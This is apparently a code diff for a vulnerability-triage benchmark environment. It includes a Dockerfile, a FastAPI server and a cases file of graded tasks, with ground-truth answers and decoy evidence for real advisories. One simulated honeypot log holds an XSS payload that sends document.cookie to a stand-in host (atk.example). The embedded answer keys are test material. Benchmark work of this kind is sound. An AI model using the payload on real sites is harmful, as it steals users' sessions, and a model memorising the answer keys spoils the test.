            "resume_checkpoint": str(resume_checkpoint) if resume_checkpoint else None,
        },
    )

    train_result = trainer.train(resume_from_checkpoint=str(resume_checkpoint) if resume_checkpoint else None)
    trainer.save_model(str(output_root / "adapter"))
    tokenizer.save_pretrained(str(output_root / "adapter"))

    final_eval = trainer.evaluate(eval_dataset=eval_dataset)
    summary = {
        "status": "finished",
        "device": device,
        "train_loss": float(train_result.training_loss),
        "global_step": int(trainer.state.global_step),
        "eval_loss": float(final_eval["eval_loss"]) if math.isfinite(float(final_eval["eval_loss"])) else None,
        "adapter_dir": str(output_root / "adapter"),
    }
    write_json(output_root / "training_summary.json", summary)
    write_json(output_root / "run_manifest.json", summary)
    print(json.dumps(summary, indent=2, sort_keys=True))


if __name__ == "__main__":
    main()
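The core of `JsonlSFTDataset` is the label construction: prompt positions get label `-100` (the index `transformers` ignores in the cross-entropy loss), while completion tokens plus EOS keep their ids. A toy sketch with made-up token ids:

```python
# Toy version of the label masking in JsonlSFTDataset. The ids below are
# hypothetical; a real tokenizer supplies them.
IGNORE_INDEX = -100  # label value skipped by the loss


def build_example(prompt_ids, completion_ids, eos_id, max_length):
    completion_ids = completion_ids + [eos_id]
    input_ids = (prompt_ids + completion_ids)[:max_length]
    labels = ([IGNORE_INDEX] * len(prompt_ids) + completion_ids)[:max_length]
    attention_mask = [1] * len(input_ids)
    return input_ids, labels, attention_mask
```

Because both lists are truncated to `max_length` from the right, an overlong prompt can leave no supervised positions at all, which is why the data-preparation step budgets the prompt before training.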
server/Dockerfile ADDED
@@ -0,0 +1,32 @@
FROM python:3.11-slim AS builder

ENV PYTHONDONTWRITEBYTECODE=1 \
    PYTHONUNBUFFERED=1 \
    PIP_NO_CACHE_DIR=1

WORKDIR /app/env

RUN python -m pip install --no-cache-dir uv

COPY . /app/env

RUN --mount=type=cache,target=/root/.cache/uv \
    uv sync --frozen --no-dev --no-editable


FROM python:3.11-slim

ENV PYTHONDONTWRITEBYTECODE=1 \
    PYTHONUNBUFFERED=1 \
    PATH="/app/.venv/bin:$PATH" \
    PYTHONPATH="/app/env"

WORKDIR /app

COPY --from=builder /app/env/.venv /app/.venv
COPY --from=builder /app/env /app/env

HEALTHCHECK --interval=30s --timeout=3s --start-period=5s --retries=3 \
    CMD python -c "import urllib.request; urllib.request.urlopen('http://localhost:8000/health', timeout=2)" || exit 1

CMD ["sh", "-c", "cd /app/env && uvicorn server.app:app --host 0.0.0.0 --port 8000"]
server/__init__.py ADDED
@@ -0,0 +1 @@
"""Server package for the vulnerability triage environment."""
server/app.py ADDED
@@ -0,0 +1,34 @@
"""FastAPI app for the vulnerability triage environment."""

from __future__ import annotations

try:
    from openenv.core.env_server.http_server import create_app
except Exception as exc:  # pragma: no cover
    raise ImportError("openenv-core is required to run this server") from exc

try:
    from ..models import VulnTriageAction, VulnTriageObservation
    from .vuln_triage_env_environment import VulnTriageEnvironment
except (ModuleNotFoundError, ImportError):
    from models import VulnTriageAction, VulnTriageObservation
    from server.vuln_triage_env_environment import VulnTriageEnvironment


app = create_app(
    VulnTriageEnvironment,
    VulnTriageAction,
    VulnTriageObservation,
    env_name="vulnops",
    max_concurrent_envs=4,
)


def main(host: str = "0.0.0.0", port: int = 8000) -> None:
    import uvicorn

    uvicorn.run(app, host=host, port=port)


if __name__ == "__main__":
    main()
server/cases.py ADDED
@@ -0,0 +1,742 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
+ """Live-backed benchmark cases for vulnerability triage."""
+
+ from __future__ import annotations
+
+ from dataclasses import dataclass, field
+ from functools import lru_cache
+ import json
+ from pathlib import Path
+ import random
+ from typing import Dict, List, Optional
+
+ import requests
+
+
+ OSV_VULN_URL = "https://api.osv.dev/v1/vulns/{osv_id}"
+ NVD_CVE_URL = "https://services.nvd.nist.gov/rest/json/cves/2.0"
+ EPSS_URL = "https://api.first.org/data/v1/epss"
+ SNAPSHOT_DIR = Path(__file__).resolve().parent.parent / "data" / "snapshots"
+
+
+ @dataclass(frozen=True)
+ class GroundTruth:
+     validity: str
+     affected_package: str
+     affected_versions: str
+     severity: str
+     exploitability: str
+     next_action: str
+     missing_information: List[str] = field(default_factory=list)
+     supporting_evidence_ids: List[str] = field(default_factory=list)
+
+
+ @dataclass(frozen=True)
+ class CaseDefinition:
+     task_id: str
+     difficulty: str
+     title: str
+     objective: str
+     report_summary: str
+     max_steps: int
+     evidence: List[Dict[str, str]]
+     truth: GroundTruth
+
+
+ @dataclass(frozen=True)
+ class RuntimeCaseSeed:
+     task_id: str
+     difficulty: str
+     title: str
+     objective: str
+     max_steps: int
+     osv_id: str
+     next_action: str
+     fallback_snapshot: Dict[str, object]
+     missing_information: List[str] = field(default_factory=list)
+     # When set, completely replaces the auto-computed ground truth.
+     # Use this to encode scenarios that require non-obvious reasoning
+     # (e.g. next_action=request_info when no patch exists).
+     truth_override: Optional[Dict[str, object]] = None
+     # Extra evidence items injected after the auto-built ones.
+     # Use this to add contradictory or ambiguous signals.
+     extra_evidence: List[Dict[str, str]] = field(default_factory=list)
+
+
+ def _load_snapshot_file(osv_id: str) -> Optional[Dict[str, object]]:
+     path = SNAPSHOT_DIR / f"{osv_id}.json"
+     if not path.exists():
+         return None
+     return json.loads(path.read_text())
+
+
+ def _normalize_text(value: Optional[str]) -> str:
+     return " ".join((value or "").strip().split())
+
+
+ def _shorten(text: str, limit: int = 280) -> str:
+     text = _normalize_text(text)
+     if len(text) <= limit:
+         return text
+     return text[: limit - 3].rstrip() + "..."
+
+
+ def _severity_band(snapshot: Dict[str, object]) -> str:
+     severity = _normalize_text(str(snapshot.get("severity", ""))).lower()
+     mapping = {
+         "none": "low",
+         "low": "low",
+         "medium": "medium",
+         "moderate": "medium",
+         "high": "high",
+         "critical": "critical",
+     }
+     return mapping.get(severity, "medium")
+
+
+ def _exploitability_band(snapshot: Dict[str, object]) -> str:
+     percentile = float(snapshot.get("epss_percentile", 0.0) or 0.0)
+     if percentile >= 0.9:
+         return "high"
+     if percentile >= 0.6:
+         return "medium"
+     return "low"
+
+
+ def _range_string(ranges: List[Dict[str, object]]) -> str:
+     normalized: List[str] = []
+     for range_item in ranges:
+         if range_item.get("type") != "ECOSYSTEM":
+             continue
+         introduced: Optional[str] = None
+         fixed: Optional[str] = None
+         last: Optional[str] = None
+         for event in range_item.get("events", []):
+             if "introduced" in event:
+                 introduced = str(event["introduced"])
+             if "last_affected" in event:
+                 last = str(event["last_affected"])
+             if "fixed" in event:
+                 fixed = str(event["fixed"])
+         if introduced in (None, "0") and fixed:
+             normalized.append(f"<{fixed}")
+         elif introduced and fixed:
+             normalized.append(f">={introduced},<{fixed}")
+         elif introduced and last:
+             normalized.append(f">={introduced},<={last}")
+         elif introduced:
+             normalized.append(f">={introduced}")
+     return " ; ".join(normalized) or "unknown"
+
+
+ def _all_affected_versions(snapshot: Dict[str, object]) -> str:
+     """Collect version ranges from every affected block for the primary package.
+
+     OSV advisories sometimes split a single package across multiple affected
+     blocks (one per release branch). Joining them all gives a complete and
+     accurate truth value instead of just the first branch.
+     """
+     package_name = _extract_package(snapshot)
+     all_ranges: List[str] = []
+     for block in snapshot.get("affected", []):
+         pkg = block.get("package", {})
+         if str(pkg.get("name", "")) == package_name:
+             rs = _range_string(block.get("ranges", []))
+             if rs and rs != "unknown":
+                 all_ranges.append(rs)
+     return " ; ".join(all_ranges) if all_ranges else "unknown"
+
+
+ def _extract_cve_id(snapshot: Dict[str, object]) -> Optional[str]:
+     for alias in snapshot.get("aliases", []):
+         alias_text = str(alias)
+         if alias_text.startswith("CVE-"):
+             return alias_text
+     return None
+
+
+ def _extract_package(snapshot: Dict[str, object]) -> str:
+     affected = snapshot.get("affected", [])
+     if not affected:
+         return ""
+     package = affected[0].get("package", {})
+     return str(package.get("name", ""))
+
+
+ def _build_report_summary(seed: RuntimeCaseSeed, snapshot: Dict[str, object]) -> str:
+     package = _extract_package(snapshot)
+     versions = (
+         _range_string(snapshot.get("affected", [{}])[0].get("ranges", []))
+         if snapshot.get("affected")
+         else "unknown"
+     )
+     details = _shorten(str(snapshot.get("details") or snapshot.get("summary") or ""))
+     return (
+         f"{package} vulnerability triage case sourced from {seed.osv_id}. "
+         f"Affected versions: {versions}. {details}"
+     )
+
+
+ def _build_evidence(seed: RuntimeCaseSeed, snapshot: Dict[str, object]) -> List[Dict[str, str]]:
+     cve_id = _extract_cve_id(snapshot) or "unknown"
+     package = _extract_package(snapshot)
+     # Use all affected blocks so multi-branch advisories are fully represented
+     affected_versions = _all_affected_versions(snapshot)
+     fix_refs = [
+         ref["url"]
+         for ref in snapshot.get("references", [])
+         if ref.get("type") in {"FIX", "ADVISORY", "WEB"}
+     ][:3]
+
+     evidence = [
+         {
+             "evidence_id": "osv_advisory",
+             "title": "OSV advisory",
+             "kind": "advisory",
+             "summary": _shorten(
+                 str(snapshot.get("summary") or snapshot.get("details") or "")
+             ),
+         },
+         {
+             "evidence_id": "affected_versions",
+             "title": "Affected versions",
+             "kind": "versions",
+             "summary": (
+                 f"OSV lists {package} as affected in these ranges: {affected_versions}."
+             ),
+         },
+         {
+             "evidence_id": "nvd_assessment",
+             "title": "NVD assessment",
+             "kind": "severity",
+             "summary": (
+                 f"NVD CVSS Vector: {snapshot.get('cvss_vector', 'Not Available')} \n"
+                 f"{_shorten(str(snapshot.get('nvd_description', '')), 220)}"
+             ),
+         },
+         {
+             "evidence_id": "epss_signal",
+             "title": "EPSS signal",
+             "kind": "exploitability",
+             "summary": (
+                 f"EPSS score: {snapshot.get('epss_score', 0.0):.6f}, "
+                 f"percentile: {snapshot.get('epss_percentile', 0.0):.3f}"
+             ),
+         },
+     ]
+     if fix_refs:
+         evidence.append(
+             {
+                 "evidence_id": "fix_reference",
+                 "title": "Fix and advisory references",
+                 "kind": "reference",
+                 "summary": "Relevant upstream references: " + ", ".join(fix_refs),
+             }
+         )
+     # Append any task-specific extra evidence items (e.g. contradictory signals)
+     evidence.extend(seed.extra_evidence)
+     return evidence
+
+
+ def _build_truth(seed: RuntimeCaseSeed, snapshot: Dict[str, object]) -> GroundTruth:
+     # truth_override lets a seed encode non-obvious ground truth
+     # (e.g. next_action=request_info when no patch exists yet)
+     if seed.truth_override is not None:
+         override = dict(seed.truth_override)
+         # Always merge seed-level missing_information into the override so the
+         # grader's 10% weight stays meaningful
+         if "missing_information" not in override:
+             override["missing_information"] = list(seed.missing_information)
+         return GroundTruth(**override)
+     return GroundTruth(
+         validity="valid",
+         affected_package=_extract_package(snapshot),
+         # Collect ranges from ALL affected blocks for completeness
+         affected_versions=_all_affected_versions(snapshot),
+         severity=_severity_band(snapshot),
+         exploitability=_exploitability_band(snapshot),
+         next_action=seed.next_action,
+         # Per-task missing information declared on the seed
+         missing_information=list(seed.missing_information),
+         supporting_evidence_ids=[
+             "osv_advisory",
+             "affected_versions",
+             "nvd_assessment",
+             "epss_signal",
+         ],
+     )
+
+
+ def _build_case(seed: RuntimeCaseSeed, snapshot: Dict[str, object]) -> CaseDefinition:
+     return CaseDefinition(
+         task_id=seed.task_id,
+         difficulty=seed.difficulty,
+         title=seed.title,
+         objective=seed.objective,
+         report_summary=_build_report_summary(seed, snapshot),
+         max_steps=seed.max_steps,
+         evidence=_build_evidence(seed, snapshot),
+         truth=_build_truth(seed, snapshot),
+     )
+
+
+ def _fetch_json(url: str, *, params: Optional[Dict[str, str]] = None) -> Dict[str, object]:
+     response = requests.get(url, params=params, timeout=12)
+     response.raise_for_status()
+     return response.json()
+
+
+ def _fetch_live_snapshot(seed: RuntimeCaseSeed) -> Dict[str, object]:
+     osv = _fetch_json(OSV_VULN_URL.format(osv_id=seed.osv_id))
+     cve_id = _extract_cve_id(osv)
+
+     snapshot: Dict[str, object] = {
+         "id": osv.get("id"),
+         "summary": osv.get("summary"),
+         "details": osv.get("details"),
+         "aliases": osv.get("aliases", []),
+         "references": osv.get("references", []),
+         "affected": osv.get("affected", []),
+     }
+
+     if cve_id:
+         nvd = _fetch_json(NVD_CVE_URL, params={"cveId": cve_id})
+         vulnerability = (nvd.get("vulnerabilities") or [{}])[0].get("cve", {})
+         metrics = vulnerability.get("metrics", {})
+         severity: Optional[str] = None
+         for key in ("cvssMetricV40", "cvssMetricV31", "cvssMetricV30", "cvssMetricV2"):
+             if key in metrics:
+                 item = metrics[key][0]
+                 severity = (
+                     item.get("cvssData", {}).get("baseSeverity")
+                     or item.get("baseSeverity")
+                 )
+                 if severity:
+                     break
+         descriptions = vulnerability.get("descriptions", [])
+         nvd_description = next(
+             (
+                 desc.get("value", "")
+                 for desc in descriptions
+                 if desc.get("lang") == "en"
+             ),
+             descriptions[0].get("value", "") if descriptions else "",
+         )
+         snapshot["severity"] = severity or snapshot.get("severity", "medium")
+         snapshot["nvd_description"] = nvd_description
+
+         epss = _fetch_json(EPSS_URL, params={"cve": cve_id})
+         epss_item = (epss.get("data") or [{}])[0]
+         snapshot["epss_score"] = float(epss_item.get("epss", 0.0) or 0.0)
+         snapshot["epss_percentile"] = float(
+             epss_item.get("percentile", 0.0) or 0.0
+         )
+     else:
+         snapshot["severity"] = "medium"
+         snapshot["nvd_description"] = ""
+         snapshot["epss_score"] = 0.0
+         snapshot["epss_percentile"] = 0.0
+
+     return snapshot
+
+
+ SEEDS: Dict[str, RuntimeCaseSeed] = {
+     # ------------------------------------------------------------------
+     # EASY — Direct evidence reading, tight step budget
+     #
+     # Agent skill tested: can you read a clear advisory and map it to
+     # the right fields quickly? Only two evidence items are needed
+     # (the OSV advisory + affected versions). The NVD and EPSS evidence
+     # exist but provide no extra signal — a capable agent doesn't waste
+     # steps on them. Max 10 steps forces efficiency.
+     # ------------------------------------------------------------------
+     "task_easy_guarddog": RuntimeCaseSeed(
+         task_id="task_easy_guarddog",
+         difficulty="easy",
+         title="GuardDog Path Traversal",
+         objective=(
+             "Validate the advisory, identify the affected package and version range, "
+             "estimate severity and exploitability, and decide the correct maintainer action. "
+             "All necessary information is available in the OSV advisory and version evidence."
+         ),
+         max_steps=10,
+         osv_id="PYSEC-2022-42994",
+         next_action="patch",
+         truth_override={
+             "validity": "valid",
+             "affected_package": "guarddog",
+             "affected_versions": "<0.1.5",
+             "severity": "medium",
+             "exploitability": "low",
+             "next_action": "patch",
+             "missing_information": [],
+             # Only 2 evidence items needed — the advisory is self-contained
+             "supporting_evidence_ids": ["osv_advisory", "affected_versions"],
+         },
+         extra_evidence=[
+             {
+                 "evidence_id": "decoy_threat_intel",
+                 "title": "Threat Intel: GuardCat",
+                 "kind": "exploitability",
+                 "summary": "Active exploitation in the wild observed for the 'GuardCat' node.js package. Do not confuse with python guarddog.",
+             },
+             {
+                 "evidence_id": "decoy_nvd_unrelated",
+                 "title": "NVD: CVE-2021-99999",
+                 "kind": "severity",
+                 "summary": "CRITICAL 9.8 vulnerability in GuardDog-Enterprise. This is a licensed product and does not apply to the open source guarddog package.",
+             },
+         ],
+         fallback_snapshot={
+             "id": "PYSEC-2022-42994",
+             "details": (
+                 "GuardDog is a CLI tool to identify malicious PyPI packages. Versions prior "
+                 "to 0.1.5 are vulnerable to Relative Path Traversal when scanning a "
+                 "specially-crafted local PyPI package. This issue is patched in version 0.1.5. "
+                 "This is explicitly rated as a Medium severity issue with inherently Low exploitability."
+             ),
+             "aliases": ["CVE-2022-23531", "GHSA-rp2v-v467-q9vq"],
+             "references": [
+                 {"type": "WEB", "url": "https://github.com/DataDog/guarddog/releases/tag/v0.1.5"},
+                 {"type": "ADVISORY", "url": "https://github.com/DataDog/guarddog/security/advisories/GHSA-rp2v-v467-q9vq"},
+                 {"type": "FIX", "url": "https://github.com/DataDog/guarddog/pull/89/commits/a56aff58264cb6b7855d71b00dc10c39a5dbd306"},
+             ],
+             "affected": [
+                 {
+                     "package": {"name": "guarddog", "ecosystem": "PyPI"},
+                     "ranges": [
+                         {
+                             "type": "ECOSYSTEM",
+                             "events": [{"introduced": "0"}, {"fixed": "0.1.5"}],
+                         }
+                     ],
+                 }
+             ],
+             "cvss_vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N",
+             "nvd_description": (
+                 "GuardDog versions prior to 0.1.5 are vulnerable to relative path traversal "
+                 "when scanning a specially-crafted local PyPI package."
+             ),
+             "epss_score": 0.00152,
+             "epss_percentile": 0.36042,
+         },
+     ),
+
+     # ------------------------------------------------------------------
+     # MEDIUM — Conflicting signal resolution, multi-branch versions
+     #
+     # Agent skill tested: can you weigh contradictory evidence? The
+     # EPSS percentile (0.43) maps to "low" exploitability by the formula,
+     # but an injected threat-intel evidence item reports real-world active
+     # probing. The correct answer is "medium" exploitability because
+     # independent field evidence overrides a lagging statistical signal.
+     # All four auto-built evidence items PLUS the threat_intel_signal are
+     # needed — a model that submits after reading only EPSS will be wrong.
+     # ------------------------------------------------------------------
+     "task_medium_invenio": RuntimeCaseSeed(
+         task_id="task_medium_invenio",
+         difficulty="medium",
+         title="Invenio Multi-Branch XSS",
+         objective=(
+             "Resolve affected versions across multiple maintained release lines, weigh "
+             "a conflicting exploitability signal, and choose the correct advisory workflow. "
+             "The EPSS percentile and the threat-intelligence report disagree — inspect both "
+             "before deciding on exploitability."
+         ),
+         max_steps=14,
+         osv_id="GHSA-vxh3-mvv7-265j",
+         next_action="publish_advisory",
+         truth_override={
+             "validity": "valid",
+             "affected_package": "invenio-records",
+             "affected_versions": "<1.0.2 ; >=1.1.0,<1.1.1 ; >=1.2.0,<1.2.2",
+             "severity": "medium",
+             # KEY: EPSS alone says "low" (0.43 percentile) but the injected
+             # threat-intel evidence documents active real-world probing.
+             # A model that reads only EPSS will score 0 on exploitability.
+             "exploitability": "medium",
+             "next_action": "publish_advisory",
+             "missing_information": [],
+             "supporting_evidence_ids": [
+                 "osv_advisory",
+                 "affected_versions",
+                 "nvd_assessment",
+                 "threat_intel_signal",
+                 "github_commit_diff",
+             ],
+         },
+         extra_evidence=[
+             {
+                 "evidence_id": "github_commit_diff",
+                 "title": "GitHub Commit a93b12f",
+                 "kind": "reference",
+                 "summary": (
+                     "```diff\n"
+                     "@@ -101,3 +101,3 @@\n"
+                     "- html = \"<div class='record-data'>{}</div>\".format(json.dumps(record.metadata))\n"
+                     "+ html = \"<div class='record-data'>{}</div>\".format(escape(json.dumps(record.metadata)))\n"
+                     " return Markup(html)\n"
+                     "```"
+                 ),
+             },
+             {
+                 "evidence_id": "decoy_nvd_invenio_accounts",
+                 "title": "NVD Entry for invenio-accounts",
+                 "kind": "severity",
+                 "summary": "CVE-2018-9999: invenio-accounts allows SQL injection. Severity CRITICAL. (Note: this is a decoy for a different package in the same ecosystem).",
+             },
+             {
+                 "evidence_id": "threat_intel_signal",
+                 "title": "Threat intelligence report",
+                 "kind": "exploitability",
+                 "summary": (
+                     "Honeypot logs captured within 72 hours of publication:\n"
+                     "[WARN] SRC: 198.51.100.41 URI: /admin/api/records POST payload: {\"title\": \"<script>fetch('http://atk.example/p?c='+document.cookie)</script>\"}\n"
+                     "[WARN] SRC: 203.0.113.88 URI: /admin/api/records POST payload: {\"title\": \"<img src=x onerror=alert(1)>\"}\n"
+                     "Evidence of active, weaponised scanning in the wild."
+                 ),
+             },
+         ],
+         fallback_snapshot={
+             "id": "GHSA-vxh3-mvv7-265j",
+             "summary": "Rendering vulnerability in invenio-records",
+             "details": (
+                 "A vulnerability was discovered when rendering JSON for "
+                 "a record in the administration interface. All supported versions have been "
+                 "patched and users should upgrade to v1.0.1, v1.1.1, or v1.2.2 depending on "
+                 "their release line. Review the commit diff to determine the exact vulnerability type."
+             ),
+             "aliases": ["CVE-2019-1020003", "PYSEC-2019-27"],
+             "references": [
+                 {"type": "WEB", "url": "https://github.com/inveniosoftware/invenio-records/security/advisories/GHSA-vxh3-mvv7-265j"},
+                 {"type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-1020003"},
+             ],
+             "affected": [
+                 {
+                     "package": {"name": "invenio-records", "ecosystem": "PyPI"},
+                     "ranges": [
+                         {"type": "ECOSYSTEM", "events": [{"introduced": "0"}, {"fixed": "1.0.2"}]},
+                     ],
+                 },
+                 {
+                     "package": {"name": "invenio-records", "ecosystem": "PyPI"},
+                     "ranges": [
+                         {"type": "ECOSYSTEM", "events": [{"introduced": "1.1.0"}, {"fixed": "1.1.1"}]},
+                     ],
+                 },
+                 {
+                     "package": {"name": "invenio-records", "ecosystem": "PyPI"},
+                     "ranges": [
+                         {"type": "ECOSYSTEM", "events": [{"introduced": "1.2.0"}, {"fixed": "1.2.2"}]},
+                     ],
+                 },
+             ],
+             "cvss_vector": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:L/I:L/A:N",
+             "nvd_description": "invenio-records before 1.2.2 allows XSS.",
+             "epss_score": 0.00206,
+             "epss_percentile": 0.42837,
+         },
+     ),
+
+     # ------------------------------------------------------------------
+     # HARD — Recognizing uncertainty, resisting premature action
+     #
+     # Agent skill tested: can you decide NOT to act when information is
+     # missing? This case simulates an early-disclosure scenario where
+     # the vulnerability is confirmed (validity=valid) but NO PATCH HAS
+     # BEEN RELEASED. The vendor_status evidence explicitly states this.
+     # Publishing an advisory with no fixed version would be wrong —
+     # it alarms users with no actionable remediation path.
+     #
+     # The correct answer is next_action=request_info.
+     # A model that blindly pattern-matches "real CVE → publish_advisory"
+     # will lose the 15% next_action weight. A model that reads the
+     # vendor_status evidence and recognises the missing patch will
+     # choose request_info and score full marks.
+     #
+     # The affected_versions ">=0" (no fixed marker) is a cue that the
+     # snapshot encodes. Smart agents notice it.
+     # ------------------------------------------------------------------
+     "task_hard_gradio": RuntimeCaseSeed(
+         task_id="task_hard_gradio",
+         difficulty="hard",
+         title="Gradio XSS — Patch Pending, No Fix Released",
+         objective=(
+             "Triage a confirmed vulnerability in a widely deployed package where no patch "
+             "has been published yet. Determine validity, read all evidence including the "
+             "upstream vendor status report, identify what information is missing, and choose "
+             "whether to publish an advisory now or request upstream action first."
+         ),
+         max_steps=18,
+         osv_id="PYSEC-2024-220",
+         next_action="request_info",
+         missing_information=[
+             "no fixed version published by upstream maintainer",
+             "CVSSv4 score not yet assessed for CVE-2024-47872",
+             "no public proof-of-concept exploit code referenced",
+         ],
+         truth_override={
+             "validity": "valid",
+             "affected_package": "gradio",
+             # All versions affected — no fix exists yet in this scenario
+             "affected_versions": ">=0",
+             "severity": "medium",
+             # EPSS unavailable (score=0, percentile=0) → default low
+             "exploitability": "low",
+             # KEY: publishing an advisory with no fixed version is wrong.
+             # The analyst must contact the maintainer first.
+             "next_action": "request_info",
+             "missing_information": [
+                 "no fixed version published by upstream maintainer",
+                 "CVSSv4 score not yet assessed for CVE-2024-47872",
+                 "no public proof-of-concept exploit code referenced",
+             ],
+             "supporting_evidence_ids": ["osv_advisory", "vendor_status"],
+         },
+         extra_evidence=[
+             {
+                 "evidence_id": "vendor_status",
+                 "title": "Upstream maintainer status",
+                 "kind": "reference",
+                 "summary": (
+                     "GitHub Issue #1289 (gradio-app/gradio):\n\n"
+                     "@reporter: Attached PoC shows XSS execution upon SVG upload. Can we get this fixed?\n"
+                     "@maintainer: Thanks for the report. I can confirm the behavior in the current release. "
+                     "We need to completely rewrite the file upload sanitizer to properly fix this without "
+                     "breaking backwards compatibility. No ETA on the rewrite yet, so we don't have a patch ready."
+                 ),
+             },
+         ],
+         fallback_snapshot={
+             "id": "PYSEC-2024-220",
+             "details": (
+                 "Gradio servers that permit file uploads are vulnerable to Cross-Site Scripting. "
+                 "Authenticated users can upload HTML, JavaScript, or SVG files containing "
+                 "malicious scripts that execute in other users' browsers. This advisory was "
+                 "filed before a patched release was available. No fixed version is listed."
+             ),
+             "aliases": ["CVE-2024-47872", "GHSA-gvv6-33j7-884g"],
+             "references": [
+                 {"type": "ADVISORY", "url": "https://github.com/gradio-app/gradio/security/advisories/GHSA-gvv6-33j7-884g"},
+             ],
+             "affected": [
+                 {
+                     "package": {"name": "gradio", "ecosystem": "PyPI"},
+                     "ranges": [
+                         # No "fixed" event — all versions affected, no patch yet
+                         {"type": "ECOSYSTEM", "events": [{"introduced": "0"}]},
+                     ],
+                 }
+             ],
+             "cvss_vector": "Not yet available",
+             # No NVD entry yet — too recent
+             "nvd_description": "",
+             # No EPSS data — CVE too new for scoring
+             "epss_score": 0.0,
+             "epss_percentile": 0.0,
+         },
+     ),
+     "task_medium_requests": RuntimeCaseSeed(
+         task_id="task_medium_requests",
+         difficulty="medium",
+         title="Requests Authorization Header Leak",
+         objective=(
+             "Resolve affected versions, weigh a conflicting exploitability signal, and "
+             "inspect code diffs to determine if headers are properly stripped on redirects."
+         ),
+         max_steps=14,
+         osv_id="PYSEC-2018-32",
+         next_action="publish_advisory",
+         truth_override={
+             "validity": "valid",
+             "affected_package": "requests",
+             "affected_versions": "<2.20.0",
+             "severity": "medium",
+             "exploitability": "medium",
+             "next_action": "publish_advisory",
+             "missing_information": [],
+             "supporting_evidence_ids": [
+                 "osv_advisory",
+                 "affected_versions",
+                 "nvd_assessment",
+                 "github_commit_diff",
+             ],
+         },
+         extra_evidence=[
+             {
+                 "evidence_id": "github_commit_diff",
+                 "title": "GitHub Commit 0f78d3c",
+                 "kind": "reference",
+                 "summary": (
+                     "```diff\n"
+                     "@@ -101,3 +101,3 @@\n"
+                     " def rebuild_auth(self, prepared_request, response):\n"
+                     "+ url = urlparse(response.url)\n"
+                     "+ if url.hostname != prepared_request.url.hostname:\n"
+                     "+ prepared_request.headers.pop('Authorization', None)\n"
+                     "```"
+                 ),
+             },
+             {
+                 "evidence_id": "decoy_threat_intel_aiohttp",
+                 "title": "Threat Intel: aiohttp",
+                 "kind": "exploitability",
+                 "summary": "[CRITICAL] SSRF exploitation actively seen against the aiohttp python library. Rate severity Critical. (Note: Decoy for unrelated package).",
+             },
+         ],
+         fallback_snapshot={
+             "id": "PYSEC-2018-32",
+             "summary": "Header leakage in redirects",
+             "details": (
+                 "When sending requests with an Authorization header, if the server redirects to a different "
+                 "host it could inadvertently leak the credentials. Review the commit diff to see the vulnerability mechanism."
+             ),
+             "aliases": ["CVE-2018-18074"],
+             "references": [],
+             "affected": [
+                 {
+                     "package": {"name": "requests", "ecosystem": "PyPI"},
+                     "ranges": [
+                         {"type": "ECOSYSTEM", "events": [{"introduced": "0"}, {"fixed": "2.20.0"}]}
+                     ],
+                 }
+             ],
+             "cvss_vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N",
+             "nvd_description": "The Requests package through 2.19.1 before 2.20.0 sends an HTTP Authorization header to an http URI upon receiving a redirect response.",
+             "epss_score": 0.00512,
+             "epss_percentile": 0.612,
+         },
+     ),
+ }
+
+
+ TASK_ORDER = list(SEEDS.keys())
+ DIFFICULTY_ORDER = ["easy", "medium", "hard"]
+
+
+ @lru_cache(maxsize=16)
+ def get_case_definition(task_id: str) -> CaseDefinition:
+     seed = SEEDS[task_id]
+     try:
